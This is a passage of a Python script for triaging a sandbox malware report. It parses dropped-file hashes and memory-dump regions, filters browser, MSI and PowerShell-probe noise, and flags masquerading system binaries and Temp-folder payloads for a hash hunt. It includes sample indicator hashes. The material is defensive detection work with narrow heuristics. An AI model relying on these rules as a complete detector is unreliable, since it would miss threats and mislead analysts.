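HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
WIN_PATH = re.compile(r"^[A-Za-z]:\\")


def parse_listing(text):
    """Return (files, regions): files are {'path', 'hashes'} dicts, regions (pid, seq, start, end)."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := MEM_LINE.match(line):
            pid, seq, start, end = m.groups()
            regions.append((int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None
        elif (m := HASH_LINE.match(line)) and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()
        elif WIN_PATH.match(line):  # any drive-letter path starts a new entry
            current = {"path": line, "hashes": {}}
            files.append(current)
    return files, regions


# PowerShell writes __PSScriptPolicyTest_*.ps1 containing the single byte "1" to
# probe AppLocker/WDAC script enforcement; these are the digests of b"1".
POLICY_PROBE_DIGESTS = {a: getattr(hashlib, a.lower())(b"1").hexdigest() for a in ("MD5", "SHA1", "SHA256")}
SYSTEM_BINARY_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
MSI_ENGINE = re.compile(r"\\(windows\\installer|config\.msi)\\|\\temp\\msi[0-9a-f]+\.(tmp|log)$")
PAYLOAD_EXTS = (".exe", ".dll", ".msi", ".dat", ".ps1")


def classify(entry):
    """Heuristic label for one dropped file (this example's rules)."""
    p, hashes = entry["path"].lower(), entry["hashes"]
    name = p.rsplit("\\", 1)[-1]
    if name.startswith("__psscriptpolicytest_") and name.endswith(".ps1"):
        known = {a: d for a, d in POLICY_PROBE_DIGESTS.items() if a in hashes}
        if known and all(hashes[a] == d for a, d in known.items()):
            return "ps_policy_probe"  # benign: file content is exactly "1"
        return "ps_policy_probe_unexpected"  # same name, other content: inspect
    if "\\google\\chrome\\user data\\" in p or "\\packages\\microsoft." in p:
        return "app_profile_noise"  # browser / Store app housekeeping writes
    if MSI_ENGINE.search(p):
        return "msi_engine_noise"  # msiexec scratch files and rollback scripts
    if name in SYSTEM_BINARY_NAMES and not p.startswith(SYSTEM_DIRS):
        return "masquerade"  # system binary name written outside system dirs
    if p.endswith(PAYLOAD_EXTS) and ("\\appdata\\" in p or "\\temp\\" in p):
        return "dropped_payload"
    return "other"


def triage(text):
    """Paths grouped by label, plus total dumped bytes per PID."""
    files, regions = parse_listing(text)
    out = {"memory_bytes_by_pid": {}}
    for f in files:
        out.setdefault(classify(f), []).append(f["path"])
    for pid, _seq, start, end in regions:
        out["memory_bytes_by_pid"][pid] = out["memory_bytes_by_pid"].get(pid, 0) + (end - start)
    return out


def hunting_sha256(text):
    """SHA256 values worth a blocklist or hunt: masquerades and dropped payloads."""
    files, _ = parse_listing(text)
    return sorted(f["hashes"]["SHA256"] for f in files
                  if "SHA256" in f["hashes"] and classify(f) in ("masquerade", "dropped_payload"))


# Constructed sample: entries copied verbatim from the report's listing, in its
# layout (SHA512 lines omitted for brevity; the parser accepts them the same way).
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7cee153545c2ab4f12bf5711cc3353b5
SHA1 f57adc37535d88a524ebc3928efba867c853a6d0
SHA256 530a68d15c602ac772cecec9e6963e041374ff5a23487f982155a01e8bc91f71

memory/1964-499-0x0000000070EE0000-0x00000000715CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1p3ra444.j3i.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

memory/1640-681-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe

MD5 a9c5924063a253f64fb86bc924be6996
SHA1 c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256 eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4

C:\Users\Admin\AppData\Local\Temp\kyV4XPwc2QRqDcs..dat

MD5 f0f942c7faac4695ff0e7002a21a12a6
SHA1 f9f1c24d6494aabe71b1d18da68cb2fbf77d4add
SHA256 eb203f4ad6ae7bab5e9608b3fd3e1d2e014393b9131dd46bb09640a299ef1006
"""
```

Run `triage(SAMPLE_LISTING)` on the full listing pasted into a file and the Chrome, MSPaint and msiexec entries fall into the noise buckets, the probe .ps1 verifies against the digests of "1", and the only SHA256 values left for a hunt are the Temp-directory svchost.exe and the .dat beside it; the per-PID byte totals give a quick sense of which process the sandbox dumped most memory from. The path rules are deliberately narrow (a name like svchost.exe outside System32/SysWOW64, executables or data files under AppData or Temp), so anything they miss lands in "other" rather than being silently discarded.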